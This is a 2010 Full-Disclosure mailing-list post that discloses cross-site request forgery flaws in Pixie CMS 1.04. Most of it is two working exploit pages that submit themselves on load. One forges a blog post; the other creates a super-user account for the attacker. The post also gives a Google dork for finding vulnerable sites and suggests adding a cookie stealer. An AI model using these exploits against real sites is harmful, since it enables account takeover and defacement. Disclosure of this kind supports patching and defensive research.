Pixie 1.04 suffers from CSRF where form data can be submitted by the admin unwittingly in this example to add a blog post or Add a new user. It was not tempted but it is possible to include a cookie stealer in the blog post which a naive admin my view if it has a curious/innocent sounding name. Here are the samples: <html> <!-- # Exploit Title: PiXie CMS v1.04 <= CSRF Add Post # Google Dork: allintext: "Pixie Powered" # Date: 28/12/2010 # Author: Ali Raheem (AKA wolfmankurd) # Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip # Version: <=1.04 # Tested on: Linux sheevaplug-debian 2.6.32-00007-g56678ec #1 PREEMPT Mon Feb 8 03:49:55 PST 2010 armv5tel GNU/Linux # Note: Replace SITE_AND_PATH Have a look at the form and set title, content, tags and Author to whatever you want. --> <head></head> <body onload='document.pwn.submit()'> <form accept-charset="UTF-8" action="http://SITE_AND_PATH/admin/?s=publish&amp;m=dynamic&amp;x=blog&amp;page=1" method="post" name="pwn" id="form_addedit" class="form"> <input type="hidden"name="table_name" value="pixie_dynamic_posts"/> <input type="hidden" class="form_text" name="post_id" value="" maxlength="11" /> <input type="hidden" class="form_text" name="page_id" value="3" maxlength="11" /> <input type="hidden" id="date" name="day" value="28"> <input type="hidden" name="month" value="12"> <input type="hidden" name="year" value="2010"> <input type="hidden" class="form_text" name="time" value="16:06" size="5" maxlength="5" /> <input type="hidden" class="form_text" name="title" id="title" value="PwnT" /> <input type="hidden" name="content" id="content" cols="50" value="PwnT by CSRF"> <input type="hidden" class="form_text" name="tags" id="tags" value="Hack"/> <input type="hidden" name="public" id="public" value="yes" /> <input type="hidden" type="radio" name="comments" id="comments" value="yes" /> <input type="hidden" class="form_text" name="author" value="AUTHOR" maxlength="64" /> <input type="hidden" class="form_text" name="last_modified" value="20101228160628" /> <input type="hidden" class="form_text" name="post_views" value="" maxlength="99" /> <input type="hidden" class="form_text" name="post_slug" value="" maxlength="255" /> <input type="hidden" name="submit_new" class="submit" value="Save" type="submit"/> </form> </body> </html> And <html> <!-- # Exploit Title: PiXie CMS v1.04 <= CSRF Add Super User # Google Dork: allintext: "Pixie Powered" # Date: 28/12/2010 # Author: Ali Raheem (AKA wolfmankurd) # Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip # Version: <=1.04 # Tested on: Linux sheevaplug-debian 2.6.32-00007-g56678ec #1 PREEMPT Mon Feb 8 03:49:55 PST 2010 armv5tel GNU/Linux Note : Repace site and path, USERNAME no spaces, REALNAME with a name, EMAIL with a valid email you get login details --> <head></head> <body onload='document.pwn.submit()'> <form accept-charset="UTF-8" action="http://SITEANDPATH/admin/?s=settings&amp;x=users" method="post" class="form" name="pwn"> <input type="hidden" name="uname" id="uname" value="USERNAME"/> <!-- No Spaces!--> <input type="hidden" name="realname" id="realname" value="REALNAME"/> <input type="hidden" name="email" id="email" value="EMAIL"/> <!-- needs to be Valid--> <input type="hidden" name="user_new" value="Save"/> <input type="hidden" name="privilege" value="2" /> </form> </body> </html> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/